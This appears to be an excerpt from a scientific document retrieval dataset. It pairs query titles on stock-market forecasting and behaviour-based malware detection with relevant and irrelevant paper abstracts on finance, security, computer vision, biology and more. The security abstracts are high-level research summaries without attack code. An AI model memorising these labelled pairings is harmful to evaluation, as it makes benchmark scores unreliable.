"text": "This study investigated the effects of two game features (the level of challenge and the reward system) on first and second graders' engagement during digital game-based learning of reading. We were particularly interested in determining how well these features managed to maintain children's engagement over the 8-week training period. The children (N ¼ 138) used GraphoGame, a web-based game training letter–sound connections, at home under the supervision of parents. Data regarding the children's gaming and engagement were stored on the GraphoGame online server. A 2 Â 2 factorial design was used to investigate the effects of the level of challenge (high challenge vs. high success) and the presence of the reward system (present vs. absent). Children's engagement was measured by session frequency and duration and through an in-game self-report survey that was presented at the end of the each session. According to the results, the children enjoyed GraphoGame but used it less frequently than expected. The reward system seemed to encourage the children to play longer sessions at the beginning of the training period, but this effect vanished after a few sessions. The level of challenge had no significant effect on children's engagement. The results suggest a need to investigate further the effectiveness of various game features in maintaining learner's engagement until the goals set for learning are achieved. Playing computer games is a popular leisure-time activity among young children. In Finland, 84 percent of first graders play computer games at least sometimes, 31 percent every day (Hirvonen, 2012). Computer games can hold children's attention for hours a day, so it is not surprising that many parents and teachers are interested in their potential as educational and motivational tools. Several studies suggest that children enjoy computer-based learning tasks more than traditional learning tasks Despite the apparent motivational appeal of digital learning, little experimental research concerning the long-term development of engagement during digital game-based learning has been conducted. When computer-based learning activities or games are introduced to young learners, they typically trigger curiosity and interest (Mitchell, 1993; Seymour et al., 1987). However, this type of interest is situational, triggered by environmental stimuli and it may or may not last over time (Hidi & Renninger, 2006). Some earlier studies imply that interest triggered by educational software may be short-, but also relatively long-lasting interest has been observed (Rosas et al., 2003). If the situational interest triggered by a novel learning tool can …",
"title": ""
}
] | scidocsrr |
cb02bc61516fdce7cc055f7a4d0fe5cf | A Stock Market Forecasting Model Combining Two-Directional Two-Dimensional Principal Component Analysis and Radial Basis Function Neural Network | [
{
"docid": "ee11c968b4280f6da0b1c0f4544bc578",
"text": "A report is presented of some results of an ongoing project using neural-network modeling and learning techniques to search for and decode nonlinear regularities in asset price movements. The author focuses on the case of IBM common stock daily returns. Having to deal with the salient features of economic data highlights the role to be played by statistical inference and requires modifications to standard learning techniques which may prove useful in other contexts.<<ETX>>",
"title": ""
},
{
"docid": "2e41b44f2dc3b429f0ff11861ba93a14",
"text": "With the economic successes of several Asian economies and their increasingly important roles in the global financial market, the prediction of Asian stock markets has becoming a hot research area. As Asian stock markets are highly dynamic and exhibit wide variation, it may more realistic and practical that assumed the stock indexes of Asian stock markets are nonlinear mixture data. In this research, a time series prediction model by combining nonlinear independent component analysis (NLICA) and neural network is proposed to forecast Asian stock markets. NLICA is a novel feature extraction technique to find independent sources from observed nonlinear mixture data where no relevant data mixing mechanisms are available. In the proposed method, we first use NLICA to transform the input space composed of original time series data into the feature space consisting of independent components representing underlying information of the original data. Then, the ICs are served as the input variables of the neural network to build prediction model. Among the Asian stock markets, Japanese and China’s stock markets are the biggest two in Asia and they respectively represent the two types of stock markets. Therefore, in order to evaluate the performance of the proposed approach, the Nikkei 225 closing index and Shanghai B-share closing index are used as illustrative examples. Experimental results show that the proposed forecasting model not only improves the prediction accuracy of the neural network approach but also outperforms the three comparison methods. The proposed stock index prediction model can be therefore a good alternative for Asian stock market indexes. 2011 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "3f6b32bdad3a7ef0302db37f1c44569a",
"text": "In this paper we propose and analyze a novel method for automatic stock trading which combines technical analysis and the nearest neighbor classification. Our first and foremost objective is to study the feasibility of the practical use of an intelligent prediction system exclusively based on the history of daily stock closing prices and volumes. To this end we propose a technique that consists of a combination of a nearest neighbor classifier and some well known tools of technical analysis, namely, stop loss, stop gain and RSI filter. For assessing the potential use of the proposed method in practice we compared the results obtained to the results that would be obtained by adopting a buy-and-hold strategy. The key performance measure in this comparison was profitability. The proposed method was shown to generate considerable higher profits than buy-and-hold for most of the companies, with few buy operations generated and, consequently, minimizing the risk of market exposure. 2010 Elsevier Ltd. All rights reserved.",
"title": ""
}
] | [
{
"docid": "f90967525247030b9da04fc4c37b6c14",
"text": "Vehicle tracking using airborne wide-area motion imagery (WAMI) for monitoring urban environments is very challenging for current state-of-the-art tracking algorithms, compared to object tracking in full motion video (FMV). Characteristics that constrain performance in WAMI to relatively short tracks range from the limitations of the camera sensor array including low frame rate and georegistration inaccuracies, to small target support size, presence of numerous shadows and occlusions from buildings, continuously changing vantage point of the platform, presence of distractors and clutter among other confounding factors. We describe our Likelihood of Features Tracking (LoFT) system that is based on fusing multiple sources of information about the target and its environment akin to a track-before-detect approach. LoFT uses image-based feature likelihood maps derived from a template-based target model, object and motion saliency, track prediction and management, combined with a novel adaptive appearance target update model. Quantitative measures of performance are presented using a set of manually marked objects in both WAMI, namely Columbus Large Image Format (CLIF), and several standard FMV sequences. Comparison with a number of single object tracking systems shows that LoFT outperforms other visual trackers, including state-of-the-art sparse representation and learning based methods, by a significant amount on the CLIF sequences and is competitive on FMV sequences.",
"title": ""
},
{
"docid": "ea6392b6a49ed40cb5e3779e0d1f3ea2",
"text": "We see the world in scenes, where visual objects occur in rich surroundings, often embedded in a typical context with other related objects. How does the human brain analyse and use these common associations? This article reviews the knowledge that is available, proposes specific mechanisms for the contextual facilitation of object recognition, and highlights important open questions. Although much has already been revealed about the cognitive and cortical mechanisms that subserve recognition of individual objects, surprisingly little is known about the neural underpinnings of contextual analysis and scene perception. Building on previous findings, we now have the means to address the question of how the brain integrates individual elements to construct the visual experience.",
"title": ""
},
{
"docid": "4bcfc77dabf9c0545fb28059a6df40c8",
"text": "Over the past decade, machine learning techniques have made substantial advances in many domains. In health care, global interest in the potential of machine learning has increased; for example, a deep learning algorithm has shown high accuracy in detecting diabetic retinopathy.1 There have been suggestions that machine learning will drive changes in health care within a few years, specifically in medical disciplines that require more accurate prognostic models (eg, oncology) and those based on pattern recognition (eg, radiology and pathology). However, comparative studies on the effectiveness of machine learning–based decision support systems (ML-DSS) in medicine are lacking, especially regarding the effects on health outcomes. Moreover, the introduction of new technologies in health care has not always been straightforward or without unintended and adverse effects.2 In this Viewpoint we consider the potential unintended consequences that may result from the application of ML-DSS in clinical practice.",
"title": ""
},
{
"docid": "9dbac84cc91712d6cefdc4f877614106",
"text": "In order to automatically identify a set of effective mammographic image features and build an optimal breast cancer risk stratification model, this study aims to investigate advantages of applying a machine learning approach embedded with a locally preserving projection (LPP) based feature combination and regeneration algorithm to predict short-term breast cancer risk. A dataset involving negative mammograms acquired from 500 women was assembled. This dataset was divided into two age-matched classes of 250 high risk cases in which cancer was detected in the next subsequent mammography screening and 250 low risk cases, which remained negative. First, a computer-aided image processing scheme was applied to segment fibro-glandular tissue depicted on mammograms and initially compute 44 features related to the bilateral asymmetry of mammographic tissue density distribution between left and right breasts. Next, a multi-feature fusion based machine learning classifier was built to predict the risk of cancer detection in the next mammography screening. A leave-one-case-out (LOCO) cross-validation method was applied to train and test the machine learning classifier embedded with a LLP algorithm, which generated a new operational vector with 4 features using a maximal variance approach in each LOCO process. Results showed a 9.7% increase in risk prediction accuracy when using this LPP-embedded machine learning approach. An increased trend of adjusted odds ratios was also detected in which odds ratios increased from 1.0 to 11.2. This study demonstrated that applying the LPP algorithm effectively reduced feature dimensionality, and yielded higher and potentially more robust performance in predicting short-term breast cancer risk.",
"title": ""
},
{
"docid": "4c995fce3bc3a0f9c8a06ebaec446ee7",
"text": "We introduce a facial animation system that produces real-time animation sequences including speech synchronization and non-verbal speech-related facial expressions from plain text input. A state-of-the-art text-to-speech synthesis component performs linguistic analysis of the text input and creates a speech signal from phonetic and intonation information. The phonetic transcription is additionally used to drive a speech synchronization method for the physically based facial animation. Further high-level information from the linguistic analysis such as different types of accents or pauses as well as the type of the sentence is used to generate non-verbal speech-related facial expressions such as movement of head, eyes, and eyebrows or voluntary eye blinks. Moreover, emoticons are translated into XML markup that triggers emotional facial expressions.",
"title": ""
},
{
"docid": "af737cc4e1b6d74d7acf5677dbe8f463",
"text": "(Forex) is a highly volatile complex time series for which predicting the daily trend is a challenging problem. In this paper, we investigate the prediction of the High exchange rate daily trend as a binary classification problem, with uptrend and downtrend outcomes. A large number of basic features driven from the time series data, including technical analysis features are generated using multiple history time windows. Various feature selection and feature extraction techniques are used to find best subsets for the classification problem. Machine learning systems are tested for each feature subset and results are analyzed. Four important Forex currency pairs are investigated and the results show consistent success in the daily prediction and in the expected profit.",
"title": ""
},
{
"docid": "14e2eecc36a1c08600598eb65678f99f",
"text": "The correct grasp of objects is a key aspect for the right fulfillment of a given task. Obtaining a good grasp requires algorithms to automatically determine proper contact points on the object as well as proper hand configurations, especially when dexterous manipulation is desired, and the quantification of a good grasp requires the definition of suitable grasp quality measures. This article reviews the quality measures proposed in the literature to evaluate grasp quality. The quality measures are classified into two groups according to the main aspect they evaluate: location of contact points on the object and hand configuration. The approaches that combine different measures from the two previous groups to obtain a global quality measure are also reviewed, as well as some measures related to human hand studies and grasp performance. Several examples are presented to illustrate and compare the performance of the reviewed measures.",
"title": ""
},
{
"docid": "3f268b6048d534720cac533f04c2aa7e",
"text": "This paper seeks a simple, cost effective and compact gate drive circuit for bi-directional switch of matrix converter. Principals of IGBT commutation and bi-directional switch commutation in matrix converters are reviewed. Three simple IGBT gate drive circuits are presented and simulated in PSpice and simulation results are approved by experiments in the end of this paper. Paper concludes with comparative numbers of gate drive costs.",
"title": ""
},
{
"docid": "44bd234a8999260420bb2a07934887af",
"text": "T e purpose of this review is to assess the nature and magnitudes of the dominant forces in protein folding. Since proteins are only marginally stable at room temperature,’ no type of molecular interaction is unimportant, and even small interactions can contribute significantly (positively or negatively) to stability (Alber, 1989a,b; Matthews, 1987a,b). However, the present review aims to identify only the largest forces that lead to the structural features of globular proteins: their extraordinary compactness, their core of nonpolar residues, and their considerable amounts of internal architecture. This review explores contributions to the free energy of folding arising from electrostatics (classical charge repulsions and ion pairing), hydrogen-bonding and van der Waals interactions, intrinsic propensities, and hydrophobic interactions. An earlier review by Kauzmann (1959) introduced the importance of hydrophobic interactions. His insights were particularly remarkable considering that he did not have the benefit of known protein structures, model studies, high-resolution calorimetry, mutational methods, or force-field or statistical mechanical results. The present review aims to provide a reassessment of the factors important for folding in light of current knowledge. Also considered here are the opposing forces, conformational entropy and electrostatics. The process of protein folding has been known for about 60 years. In 1902, Emil Fischer and Franz Hofmeister independently concluded that proteins were chains of covalently linked amino acids (Haschemeyer & Haschemeyer, 1973) but deeper understanding of protein structure and conformational change was hindered because of the difficulty in finding conditions for solubilization. Chick and Martin (191 1) were the first to discover the process of denaturation and to distinguish it from the process of aggregation. By 1925, the denaturation process was considered to be either hydrolysis of the peptide bond (Wu & Wu, 1925; Anson & Mirsky, 1925) or dehydration of the protein (Robertson, 1918). The view that protein denaturation was an unfolding process was",
"title": ""
},
{
"docid": "4a1b004dbade15e305b86d5eff9e814a",
"text": "We describe a heuristic method for drawing graphs which uses a multilevel framework combined with a force-directed placement algorithm. The multilevel technique matches and coalesces pairs of adjacent vertices to define a new graph and is repeated recursively to create a hierarchy of increasingly coarse graphs, G0, G1, . . . , GL. The coarsest graph, GL, is then given an initial layout and the layout is refined and extended to all the graphs starting with the coarsest and ending with the original. At each successive change of level, l, the initial layout for Gl is taken from its coarser and smaller child graph, Gl+1, and refined using force-directed placement. In this way the multilevel framework both accelerates and appears to give a more global quality to the drawing. The algorithm can compute both 2 & 3 dimensional layouts and we demonstrate it on examples ranging in size from 10 to 225,000 vertices. It is also very fast and can compute a 2D layout of a sparse graph in around 12 seconds for a 10,000 vertex graph to around 5-7 minutes for the largest graphs. This is an order of magnitude faster than recent implementations of force-directed placement algorithms.",
"title": ""
},
{
"docid": "211cf327b65cbd89cf635bbeb5fa9552",
"text": "BACKGROUND\nAdvanced mobile communications and portable computation are now combined in handheld devices called \"smartphones\", which are also capable of running third-party software. The number of smartphone users is growing rapidly, including among healthcare professionals. The purpose of this study was to classify smartphone-based healthcare technologies as discussed in academic literature according to their functionalities, and summarize articles in each category.\n\n\nMETHODS\nIn April 2011, MEDLINE was searched to identify articles that discussed the design, development, evaluation, or use of smartphone-based software for healthcare professionals, medical or nursing students, or patients. A total of 55 articles discussing 83 applications were selected for this study from 2,894 articles initially obtained from the MEDLINE searches.\n\n\nRESULTS\nA total of 83 applications were documented: 57 applications for healthcare professionals focusing on disease diagnosis (21), drug reference (6), medical calculators (8), literature search (6), clinical communication (3), Hospital Information System (HIS) client applications (4), medical training (2) and general healthcare applications (7); 11 applications for medical or nursing students focusing on medical education; and 15 applications for patients focusing on disease management with chronic illness (6), ENT-related (4), fall-related (3), and two other conditions (2). The disease diagnosis, drug reference, and medical calculator applications were reported as most useful by healthcare professionals and medical or nursing students.\n\n\nCONCLUSIONS\nMany medical applications for smartphones have been developed and widely used by health professionals and patients. The use of smartphones is getting more attention in healthcare day by day. Medical applications make smartphones useful tools in the practice of evidence-based medicine at the point of care, in addition to their use in mobile clinical communication. Also, smartphones can play a very important role in patient education, disease self-management, and remote monitoring of patients.",
"title": ""
},
{
"docid": "c3bd3031eeac1c223078094a8d7a2eb0",
"text": "Ambient-assisted living (AAL) is, nowadays, an important research and development area, foreseen as an important instrument to face the demographic aging. The acceptance of the AAL paradigm is closely related to the quality of the available systems, namely in terms of intelligent functions for the user interaction. In that context, usability and accessibility are crucial issues to consider. This paper presents a systematic literature review of AAL technologies, products and services with the objective of establishing the current position regarding user interaction and how are end users involved in the AAL development and evaluation processes. For this purpose, a systematic review of the literature on AAL was undertaken. A total of 1,048 articles were analyzed, 111 of which were mainly related to user interaction and 132 of which described practical AAL systems applied in a specified context and with a well-defined aim. Those articles classified as user interaction and systems were further characterized in terms of objectives, target users, users’ involvement, usability and accessibility issues, settings to be applied, technologies used and development stages. The results show the need to improve the integration and interoperability of the existing technologies and to promote user-centric developments with a strong involvement of end users, namely in what concerns usability and accessibility issues.",
"title": ""
},
{
"docid": "78c40bdaaa28daa997d4727d49976536",
"text": "Multiple-input multiple-output (MIMO) systems are well suited for millimeter-wave (mmWave) wireless communications where large antenna arrays can be integrated in small form factors due to tiny wavelengths, thereby providing high array gains while supporting spatial multiplexing, beamforming, or antenna diversity. It has been shown that mmWave channels exhibit sparsity due to the limited number of dominant propagation paths, thus compressed sensing techniques can be leveraged to conduct channel estimation at mmWave frequencies. This paper presents a novel approach of constructing beamforming dictionary matrices for sparse channel estimation using the continuous basis pursuit (CBP) concept, and proposes two novel low-complexity algorithms to exploit channel sparsity for adaptively estimating multipath channel parameters in mmWave channels. We verify the performance of the proposed CBP-based beamforming dictionary and the two algorithms using a simulator built upon a three-dimensional mmWave statistical spatial channel model, NYUSIM, that is based on real-world propagation measurements. Simulation results show that the CBP-based dictionary offers substantially higher estimation accuracy and greater spectral efficiency than the grid-based counterpart introduced by previous researchers, and the algorithms proposed here render better performance but require less computational effort compared with existing algorithms.",
"title": ""
},
{
"docid": "d8a13de3c5ca958b0afac1629930d6e7",
"text": "As the number and the diversity of news outlets on the Web grows, so does the opportunity for \"alternative\" sources of information to emerge. Using large social networks like Twitter and Facebook, misleading, false, or agenda-driven information can quickly and seamlessly spread online, deceiving people or influencing their opinions. Also, the increased engagement of tightly knit communities, such as Reddit and 4chan, further compounds the problem, as their users initiate and propagate alternative information, not only within their own communities, but also to different ones as well as various social media. In fact, these platforms have become an important piece of the modern information ecosystem, which, thus far, has not been studied as a whole.\n In this paper, we begin to fill this gap by studying mainstream and alternative news shared on Twitter, Reddit, and 4chan. By analyzing millions of posts around several axes, we measure how mainstream and alternative news flows between these platforms. Our results indicate that alt-right communities within 4chan and Reddit can have a surprising level of influence on Twitter, providing evidence that \"fringe\" communities often succeed in spreading alternative news to mainstream social networks and the greater Web.",
"title": ""
},
{
"docid": "b2de917d74765e39562c60c74a88d7f3",
"text": "Computer-phobic university students are easy to find today especially when it come to taking online courses. Affect has been shown to influence users’ perceptions of computers. Although self-reported computer anxiety has declined in the past decade, it continues to be a significant issue in higher education and online courses. More importantly, anxiety seems to be a critical variable in relation to student perceptions of online courses. A substantial amount of work has been done on computer anxiety and affect. In fact, the technology acceptance model (TAM) has been extensively used for such studies where affect and anxiety were considered as antecedents to perceived ease of use. However, few, if any, have investigated the interplay between the two constructs as they influence perceived ease of use and perceived usefulness towards using online systems for learning. In this study, the effects of affect and anxiety (together and alone) on perceptions of an online learning system are investigated. Results demonstrate the interplay that exists between affect and anxiety and their moderating roles on perceived ease of use and perceived usefulness. Interestingly, the results seem to suggest that affect and anxiety may exist simultaneously as two weights on each side of the TAM scale.",
"title": ""
},
{
"docid": "a5d568b4a86dcbda2c09894c778527ea",
"text": "INTRODUCTION\nHypoglycemia (Hypo) is the most common side effect of insulin therapy in people with type 1 diabetes (T1D). Over time, patients with T1D become unaware of signs and symptoms of Hypo. Hypo unawareness leads to morbidity and mortality. Diabetes alert dogs (DADs) represent a unique way to help patients with Hypo unawareness. Our group has previously presented data in abstract form which demonstrates the sensitivity and specificity of DADS. The purpose of our current study is to expand evaluation of DAD sensitivity and specificity using a method that reduces the possibility of trainer bias.\n\n\nMETHODS\nWe evaluated 6 dogs aging 1-10 years old who had received an average of 6 months of training for Hypo alert using positive training methods. Perspiration samples were collected from patients during Hypo (BG 46-65 mg/dL) and normoglycemia (BG 85-136 mg/dl) and were used in training. These samples were placed in glass vials which were then placed into 7 steel cans (1 Hypo, 2 normal, 4 blank) randomly placed by roll of a dice. The dogs alerted by either sitting in front of, or pushing, the can containing the Hypo sample. Dogs were rewarded for appropriate recognition of the Hypo samples using a food treat via a remote control dispenser. The results were videotaped and statistically evaluated for sensitivity (proportion of lows correctly alerted, \"true positive rate\") and specificity (proportion of blanks + normal samples not alerted, \"true negative rate\") calculated after pooling data across all trials for all dogs.\n\n\nRESULTS\nAll DADs displayed statistically significant (p value <0.05) greater sensitivity (min 50.0%-max 87.5%) to detect the Hypo sample than the expected random correct alert of 14%. Specificity ranged from a min of 89.6% to a max of 97.9% (expected rate is not defined in this scenario).\n\n\nCONCLUSIONS\nOur results suggest that properly trained DADs can successfully recognize and alert to Hypo in an in vitro setting using smell alone.",
"title": ""
},
{
"docid": "d01339e077c9d8300b4616e7c713f48e",
"text": "Blockchains as a technology emerged to facilitate money exchange transactions and eliminate the need for a trusted third party to notarize and verify such transactions as well as protect data security and privacy. New structures of Blockchains have been designed to accommodate the need for this technology in other fields such as e-health, tourism and energy. This paper is concerned with the use of Blockchains in managing and sharing electronic health and medical records to allow patients, hospitals, clinics, and other medical stakeholder to share data amongst themselves, and increase interoperability. The selection of the Blockchains used architecture depends on the entities participating in the constructed chain network. Although the use of Blockchains may reduce redundancy and provide caregivers with consistent records about their patients, it still comes with few challenges which could infringe patients' privacy, or potentially compromise the whole network of stakeholders. In this paper, we investigate different Blockchains structures, look at existing challenges and provide possible solutions. We focus on challenges that may expose patients' privacy and the resiliency of Blockchains to possible attacks.",
"title": ""
},
{
"docid": "7c0328e05e30a11729bc80255e09a5b8",
"text": "This paper presents a preliminary design for a moving-target defense (MTD) for computer networks to combat an attacker's asymmetric advantage. The MTD system reasons over a set of abstract models that capture the network's configuration and its operational and security goals to select adaptations that maintain the operational integrity of the network. The paper examines both a simple (purely random) MTD system as well as an intelligent MTD system that uses attack indicators to augment adaptation selection. A set of simulation-based experiments show that such an MTD system may in fact be able to reduce an attacker's success likelihood. These results are a preliminary step towards understanding and quantifying the impact of MTDs on computer networks.",
"title": ""
},
{
"docid": "a52d2a2c8fdff0bef64edc1a97b89c63",
"text": "This paper provides a review of recent developments in speech recognition research. The concept of sources of knowledge is introduced and the use of knowledge to generate and verify hypotheses is discussed. The difficulties that arise in the construction of different types of speech recognition systems are discussed and the structure and performance of several such systems is presented. Aspects of component subsystems at the acoustic, phonetic, syntactic, and semantic levels are presented. System organizations that are required for effective interaction and use of various component subsystems in the presence of error and ambiguity are discussed.",
"title": ""
},
{
"docid": "1b8394f45b88f2474f72c500fc0a6fe4",
"text": "User-Generated live video streaming systems are services that allow anybody to broadcast a video stream over the Internet. These Over-The-Top services have recently gained popularity, in particular with e-sport, and can now be seen as competitors of the traditional cable TV. In this paper, we present a dataset for further works on these systems. This dataset contains data on the two main user-generated live streaming systems: Twitch and the live service of YouTube. We got three months of traces of these services from January to April 2014. Our dataset includes, at every five minutes, the identifier of the online broadcaster, the number of people watching the stream, and various other media information. In this paper, we introduce the dataset and we make a preliminary study to show the size of the dataset and its potentials. We first show that both systems generate a significant traffic with frequent peaks at more than 1 Tbps. Thanks to more than a million unique uploaders, Twitch is in particular able to offer a rich service at anytime. Our second main observation is that the popularity of these channels is more heterogeneous than what have been observed in other services gathering user-generated content.",
"title": ""
}
] | scidocsrr |
f6871f73d7e42aae2bfaa28375dcac05 | Analysis of Machine learning Techniques Used in Behavior-Based Malware Detection | [
{
"docid": "c3525081c0f4eec01069dd4bd5ef12ab",
"text": "More than twelve years have elapsed since the first public release of WEKA. In that time, the software has been rewritten entirely from scratch, evolved substantially and now accompanies a text on data mining [35]. These days, WEKA enjoys widespread acceptance in both academia and business, has an active community, and has been downloaded more than 1.4 million times since being placed on Source-Forge in April 2000. This paper provides an introduction to the WEKA workbench, reviews the history of the project, and, in light of the recent 3.6 stable release, briefly discusses what has been added since the last stable version (Weka 3.4) released in 2003.",
"title": ""
},
{
"docid": "f395e3d72341bd20e1a16b97259bad7d",
"text": "Malicious software in form of Internet worms, computer viru ses, and Trojan horses poses a major threat to the security of network ed systems. The diversity and amount of its variants severely undermine the effectiveness of classical signature-based detection. Yet variants of malware f milies share typical behavioral patternsreflecting its origin and purpose. We aim to exploit these shared patterns for classification of malware and propose a m thod for learning and discrimination of malware behavior. Our method proceed s in three stages: (a) behavior of collected malware is monitored in a sandbox envi ro ment, (b) based on a corpus of malware labeled by an anti-virus scanner a malware behavior classifieris trained using learning techniques and (c) discriminativ e features of the behavior models are ranked for explanation of classifica tion decisions. Experiments with di fferent heterogeneous test data collected over several month s using honeypots demonstrate the e ffectiveness of our method, especially in detecting novel instances of malware families previously not recognized by commercial anti-virus software.",
"title": ""
},
{
"docid": "11a000ec43847bae955160cf7ea3106d",
"text": "Malicious activities on the Internet are one of the most dangerous threats to Internet users and organizations. Malicious software controlled remotely is addressed as one of the most critical methods for executing the malicious activities. Since blocking domain names for command and control (C&C) of the malwares by analyzing their Domain Name System (DNS) activities has been the most effective and practical countermeasure, attackers attempt to hide their malwares by adopting several evasion techniques, such as client sub-grouping and domain flux on DNS activities. A common feature of the recently developed evasion techniques is the utilization of multiple domain names for render malware DNS activities temporally and spatially more complex. In contrast to analyzing the DNS activities for a single domain name, detecting the malicious DNS activities for multiple domain names is not a simple task. The DNS activities of malware that uses multiple domain names, termed multi-domain malware, are sparser and less synchronized with respect to space and time. In this paper, we introduce a malware activity detection mechanism, GMAD: Graph-based Malware Activity Detection that utilizes a sequence of DNS queries in order to achieve robustness against evasion techniques. GMAD uses a graph termed Domain Name Travel Graph which expresses DNS query sequences to detect infected clients and malicious domain names. In addition to detecting malware C&C domain names, GMAD detects malicious DNS activities such as blacklist checking and fake DNS querying. To detect malicious domain names utilized to malware activities, GMAD applies domain name clustering using the graph structure and determines malicious clusters by referring to public blacklists. Through experiments with four sets of DNS traffic captured in two ISP networks in the U.S. and South Korea, we show that GMAD detected thousands of malicious domain names that had neither been blacklisted nor detected through group activity of DNS clients. In a detection accuracy evaluation, GMAD showed an accuracy rate higher than 99% on average, with a higher than 90% precision and lower than 0:5% false positive rate. It is shown that the proposed method is effective for detecting multi-domain malware activities irrespective of evasion techniques. 2014 Elsevier B.V. All rights reserved.",
"title": ""
}
] | [
{
"docid": "c61db9b20e213146f82ffc22b5319be8",
"text": "The hypoxia-inducible factor α-subunits (HIFα) are key transcription factors in the mammalian response to oxygen deficiency. The HIFα regulation in response to hypoxia occurs primarily on the level of protein stability due to posttranslational hydroxylation and proteasomal degradation. However, HIF α-subunits also respond to various growth factors, hormones, or cytokines under normoxia indicating involvement of different kinase pathways in their regulation. Because these proteins participate in angiogenesis, glycolysis, programmed cell death, cancer, and ischemia, HIFα regulating kinases are attractive therapeutic targets. Although numerous kinases were reported to regulate HIFα indirectly, direct phosphorylation of HIFα affects HIFα stability, nuclear localization, and transactivity. Herein, we review the role of phosphorylation-dependent HIFα regulation with emphasis on protein stability, subcellular localization, and transactivation.",
"title": ""
},
{
"docid": "d5868da2fedb7498a9d6454ed939408c",
"text": "over concrete thinking Understand that virtual objects are computer generated, and they do not need to obey physical laws",
"title": ""
},
{
"docid": "8c467cec76d31fee70e8206769b121c3",
"text": "Color preference is an important aspect of visual experience, but little is known about why people in general like some colors more than others. Previous research suggested explanations based on biological adaptations [Hurlbert AC, Ling YL (2007) Curr Biol 17:623-625] and color-emotions [Ou L-C, Luo MR, Woodcock A, Wright A (2004) Color Res Appl 29:381-389]. In this article we articulate an ecological valence theory in which color preferences arise from people's average affective responses to color-associated objects. An empirical test provides strong support for this theory: People like colors strongly associated with objects they like (e.g., blues with clear skies and clean water) and dislike colors strongly associated with objects they dislike (e.g., browns with feces and rotten food). Relative to alternative theories, the ecological valence theory both fits the data better (even with fewer free parameters) and provides a more plausible, comprehensive causal explanation of color preferences.",
"title": ""
},
{
"docid": "b3bc34cfbe6729f7ce540a792c32bf4c",
"text": "The employment of MIMO OFDM technique constitutes a cost effective approach to high throughput wireless communications. The system performance is sensitive to frequency offset which increases with the doppler spread and causes Intercarrier interference (ICI). ICI is a major concern in the design as it can potentially cause a severe deterioration of quality of service (QoS) which necessitates the need for a high speed data detection and decoding with ICI cancellation along with the intersymbol interference (ISI) cancellation in MIMO OFDM communication systems. Iterative parallel interference canceller (PIC) with joint detection and decoding is a promising approach which is used in this work. The receiver consists of a two stage interference canceller. The co channel interference cancellation is performed based on Zero Forcing (ZF) Detection method used to suppress the effect of ISI in the first stage. The latter stage consists of a simplified PIC scheme. High bit error rates of wireless communication system require employing forward error correction (FEC) methods on the data transferred in order to avoid burst errors that occur in physical channel. To achieve high capacity with minimum error rate Low Density Parity Check (LDPC) codes which have recently drawn much attention because of their error correction performance is used in this system. The system performance is analyzed for two different values of normalized doppler shift for varying speeds. The bit error rate (BER) is shown to improve in every iteration due to the ICI cancellation. The interference analysis with the use of ICI cancellation is examined for a range of normalized doppler shift which corresponds to mobile speeds varying from 5Km/hr to 250Km/hr.",
"title": ""
},
{
"docid": "86f5c3e7b238656ae5f680db6ce0b7f5",
"text": "It is important to study and analyse educational data especially students’ performance. Educational Data Mining (EDM) is the field of study concerned with mining educational data to find out interesting patterns and knowledge in educational organizations. This study is equally concerned with this subject, specifically, the students’ performance. This study explores multiple factors theoretically assumed to affect students’ performance in higher education, and finds a qualitative model which best classifies and predicts the students’ performance based on related personal and social factors. Keywords—Data Mining; Education; Students; Performance; Patterns",
"title": ""
},
{
"docid": "175f0a7892bde96185e5fea3afc30a54",
"text": "We study the problem of searching on data that is encrypted using a public key system. Consider user Bob who sends email to user Alice encrypted under Alice’s public key. An email gateway wants to test whether the email contains the keyword “urgent” so that it could route the email accordingly. Alice, on the other hand does not wish to give the gateway the ability to decrypt all her messages. We define and construct a mechanism that enables Alice to provide a key to the gateway that enables the gateway to test whether the word “urgent” is a keyword in the email without learning anything else about the email. We refer to this mechanism as Public Key Encryption with keyword Search. As another example, consider a mail server that stores various messages publicly encrypted for Alice by others. Using our mechanism Alice can send the mail server a key that will enable the server to identify all messages containing some specific keyword, but learn nothing else. We define the concept of public key encryption with keyword search and give several constructions.",
"title": ""
},
{
"docid": "3394eb51b71e5def4e4637963da347ab",
"text": "In this paper we present a model of e-learning suitable for teacher training sessions. The main purpose of our work is to define the components of the educational system which influences the successful adoption of e-learning in the field of education. We also present the factors of the readiness of e-learning mentioned in the literature available and classifies them into the 3 major categories that constitute the components of every organization and consequently that of education. Finally, we present an implementation model of e-learning through the use of virtual private networks, which lends an added value to the realization of e-learning.",
"title": ""
},
{
"docid": "4e7003b497dc59c373347d8814c8f83e",
"text": "The present experiment was designed to test whether specific recordable changes in the neuromuscular system could be associated with specific alterations in soft- and hard-tissue morphology in the craniofacial region. The effect of experimentally induced neuromuscular changes on the craniofacial skeleton and dentition of eight rhesus monkeys was studied. The neuromuscular changes were triggered by complete nasal airway obstruction and the need for an oral airway. Alterations were also triggered 2 years later by removal of the obstruction and the return to nasal breathing. Changes in neuromuscular recruitment patterns resulted in changed function and posture of the mandible, tongue, and upper lip. There was considerable variation among the animals. Statistically significant morphologic effects of the induced changes were documented in several of the measured variables after the 2-year experimental period. The anterior face height increased more in the experimental animals than in the control animals; the occlusal and mandibular plane angles measured to the sella-nasion line increased; and anterior crossbites and malposition of teeth occurred. During the postexperimental period some of these changes were reversed. Alterations in soft-tissue morphology were also observed during both experimental periods. There was considerable variation in morphologic response among the animals. It was concluded that the marked individual variations in skeletal morphology and dentition resulting from the procedures were due to the variation in nature and degree of neuromuscular and soft-tissue adaptations in response to the altered function. The recorded neuromuscular recruitment patterns could not be directly related to specific changes in morphology.",
"title": ""
},
{
"docid": "cf79cd1f110e2539697390e37e48b8d8",
"text": "This paper investigates an application of mobile sensing: detecting and reporting the surface conditions of roads. We describe a system and associated algorithms to monitor this important civil infrastructure using a collection of sensor-equipped vehicles. This system, which we call the Pothole Patrol (P2), uses the inherent mobility of the participating vehicles, opportunistically gathering data from vibration and GPS sensors, and processing the data to assess road surface conditions. We have deployed P2 on 7 taxis running in the Boston area. Using a simple machine-learning approach, we show that we are able to identify potholes and other severe road surface anomalies from accelerometer data. Via careful selection of training data and signal features, we have been able to build a detector that misidentifies good road segments as having potholes less than 0.2% of the time. We evaluate our system on data from thousands of kilometers of taxi drives, and show that it can successfully detect a number of real potholes in and around the Boston area. After clustering to further reduce spurious detections, manual inspection of reported potholes shows that over 90% contain road anomalies in need of repair.",
"title": ""
},
{
"docid": "6098f38f1e41d25107b512a8e6f2e397",
